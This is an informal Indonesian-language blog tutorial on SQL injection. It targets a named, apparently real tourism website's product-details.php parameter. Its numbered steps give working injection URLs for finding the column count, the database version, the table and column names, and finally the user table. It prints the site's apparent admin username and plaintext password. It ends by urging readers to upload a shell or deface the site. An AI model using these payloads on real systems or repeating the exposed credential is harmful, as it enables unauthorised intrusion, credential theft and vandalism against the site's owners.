assalamu'alaikum wr.wb bertemu dengan saya kembali guys, kali ini saya akan membagikan sebuah tutorial murah tapi gk murahan banget ea :'v si noob ini akan membagikan cara bagaimana cara menyuntik pada website orng lain yaitu dengan cara mengesktract sebuah isi dalam database tersebut. jadi kalian semua udah tau ya apa itu sql injection klo masih belum paham silakan cari referensi pengertian tentang sqli.
oke langsung saja kita mulai yang pertama:
- siapkan kopi dlu :v
- situs yang rentan terhadap SQL-Injection (di sini saya menggunakan situs https://wisatabaharilamongan.com sebagai bahan pembelajaran).
1. langkah pertama kita buka situs http://www.wisatabaharilamongan.com/product-details.php?judul=Games
2. kita akan memberikan sebuah query quote ' (tanda petik) pada parameter product-details.php?judul=Games' maka akan terlihat bahwa artikel tersebut hilang!!! dan kita coba beri sebuah comment --+ pada bagian belakang query quote ' contoh : judul=Games' --+ maka artikel pun muncul kembali bahwa situs tersebut vulnerabilty terhadap SQL-Injetcion.
3. langkah selanjutnya yaitu mencari jumlah kolom dengan cara menggunakan query order by seperti ini /product-details.php?judul=Games' order by 1--+ dan angka seterusnya sampai kontent menhilang / error.
4. terlihat bahwa kolom ke 11 error, berarti jumlah kolomnya ada 10.
5. Dan langkah selanjutnya kita mencari sebuah tabel dengan cara mengurutkan nomer colomn 1 sampai ke 10 dengan mengganti function order by menjadi union all select yang digunakan untuk mengkombinasikan hasil satu atau lebih query dengan select statemenet kedalam single result. contoh: /product-details.php?judul=Games' union all select 1,3,4,5,6,7,8,9,10--+ maka akan muncul sebuah angka yang bisa kita injeksi.
6. sekarang kita akan mengetahui versi database yang digunakan dengan cara memasukan perintah @@version pada angka injeksi seperti /product-details.php?judul=Games' union all select 1,@@version,4,5,6,7,8,9,10--+ versi database yang digunakan adalah 5.6.37.
7. langkah berikutnya yaitu memunculkan nama-nama table dengan statement group_concat(table_name) pada angka injeksi tadi dan from information_schema.tables where table_schema=database() sebelum syntax comment --+ contoh: /product-details.php?judul=Games' union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--+ setelah memasukan perintah injeksinya maka akan muncul nama-nama table tersebut.
8. disini saya ingin mendapatkan informasi username dan password di website tersebut dalam database. bahwa username dan password udah jelas pada table user, kita akan mengganti query (table_name,information_schema.tables,table_schema=) menjadi perintah melihat isi column seperti berikut: /product-details.php?judul=Games' union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where table_name=user--+ jika error, kemungkinan magic_quotes tersetting ON maka untuk nama table user kita harus mengkonvert ke bilangan ASCII atau ke Hexadecimal, atau kebilangan lainnya. disini saya mengkonvert user ke bilangan hexa akan menjadi 75736572 dan diletakan setelah query where table_name=0x75736572.
9. setelah mengeksekusi perintah injeksi diatas maka akan terlihat nama column dari tabel user tadi.
10. langkah terakhir yaitu mengetahui isi dari colom name,password tersebut dengan mengubah syntax (column_name) dengan nama column contoh sebagai berikut: group_concat(name,0x3,password) dan apa itu 0x3 yaitu sebuah tanda : yang dikonversi menjadi hexadecimal, apa itu wajib ?? tidak. karena itu digunakan untuk memisahkan isi dari column tersebut agar tidak menyatu :v klo menyatu gmn dunk ntar saling suka ea :v. setelah itu hapus query information_schema.columns where table_name=user dan ganti query tersebut menjadi /product-details.php?judul=Games' union all select 1,2,group_concat(name,0x3,password),4,5,6,7,8,9,10 from user--+ dan taraaa :v terlihat sebuah isi username admin password lamongan255, biasanya sih beberapa developer mengecrypsi nya.
11. dan selanjutnya terserah lu dah mau lo apain tuh site :v upload shell,pasang receh kek biar awto sultan :v wkwkwk, klo mau nebas titip nic aja ./Nx0n3
melalui artikel ini, saya hanya ingin mencurahkan isi otak saja, bagi-bagi ilmu dikit apa yang dimaksud dengan SQL-Injection, walaupun sudah lama banget bugs ini ditemukan, tapi sampai saat ini masih terdapat beberapa site yang vulnerability terhadap SQL-Injection.
ENBE: DO IT AT YOUR OWN RISK :)














